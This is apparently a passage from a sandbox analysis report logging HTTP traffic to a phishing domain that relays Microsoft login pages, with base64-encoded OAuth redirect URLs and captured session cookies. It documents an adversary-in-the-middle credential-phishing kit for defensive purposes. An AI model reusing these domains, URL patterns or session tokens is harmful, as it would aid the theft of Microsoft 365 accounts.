text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://h89s9dhj.ccbequipamentos.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://h89s9dhj.ccbequipamentos.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk
            Source: global trafficHTTP traffic detected: GET /?piwg10otu=aHR0cHM6Ly93d3cub2ZmaWNlLmNvbS9sb2dpbiM= HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://h89s9dhj.ccbequipamentos.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; fpc=AjUAFJMlP0ZCgsS-Ll1segI; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEs2cTC55lMzi2CYsw42k_1wqQJXOtMYOzSODe6zEFFYdXCRxaO7gdZQRJIGL8ni-lzNjggwspnf8D3op1jox69xUXOtSl5_g0RklIr1K3i4amZorZVZk5WzXQwODhXgeSWz-JD3usNSG2-o1GAW7N6RK2l6X6aAIHzYd3LZEV1CsgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
            Source: global trafficHTTP traffic detected: GET /?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA== HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://h89s9dhj.ccbequipamentos.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; fpc=AjUAFJMlP0ZCgsS-Ll1segI; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEs2cTC55lMzi2CYsw42k_1wqQJXOtMYOzSODe6zEFFYdXCRxaO7gdZQRJIGL8ni-lzNjggwspnf8D3op1jox69xUXOtSl5_g0RklIr1K3i4amZorZVZk5WzXQwODhXgeSWz-JD3usNSG2-o1GAW7N6RK2l6X6aAIHzYd3LZEV1CsgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_9810YxmrLqOR1rQ4anyNMg2.js HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; fpc=AjUAFJMlP0ZCgsS-Ll1segI; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEs2cTC55lMzi2CYsw42k_1wqQJXOtMYOzSODe6zEFFYdXCRxaO7gdZQRJIGL8ni-lzNjggwspnf8D3op1jox69xUXOtSl5_g0RklIr1K3i4amZorZVZk5WzXQwODhXgeSWz-JD3usNSG2-o1GAW7N6RK2l6X6aAIHzYd3LZEV1CsgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA
            Source: global trafficHTTP traffic detected: GET /?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==&sso_reload=true HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; fpc=AjUAFJMlP0ZCgsS-Ll1segI; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEs2cTC55lMzi2CYsw42k_1wqQJXOtMYOzSODe6zEFFYdXCRxaO7gdZQRJIGL8ni-lzNjggwspnf8D3op1jox69xUXOtSl5_g0RklIr1K3i4amZorZVZk5WzXQwODhXgeSWz-JD3usNSG2-o1GAW7N6RK2l6X6aAIHzYd3LZEV1CsgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==&sso_reload=trueAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrAvF9VazivTmPjaw1zPF1i3dl_I0Em_rxID5G6YgAA; es
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_yYLwtowrqBEhphSPA6BiJQ2.js HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1